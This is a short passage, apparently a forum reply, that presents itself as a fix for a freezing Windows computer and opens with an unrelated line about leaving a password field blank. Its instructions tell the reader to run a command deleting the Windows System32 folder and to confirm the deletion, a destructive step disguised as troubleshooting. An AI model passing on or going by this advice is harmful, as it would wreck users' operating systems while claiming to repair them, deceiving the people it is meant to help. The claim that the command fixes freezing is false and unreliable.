If you don't have an account, just leave the password field blank.
First of all, go to Start, click Run. A box should appear.
Then type into that box: "del C:\Windows\System32" without the quote marks. A box will pop up asking you if you want to do this, press Y then Enter. This should fix the freezing problem.
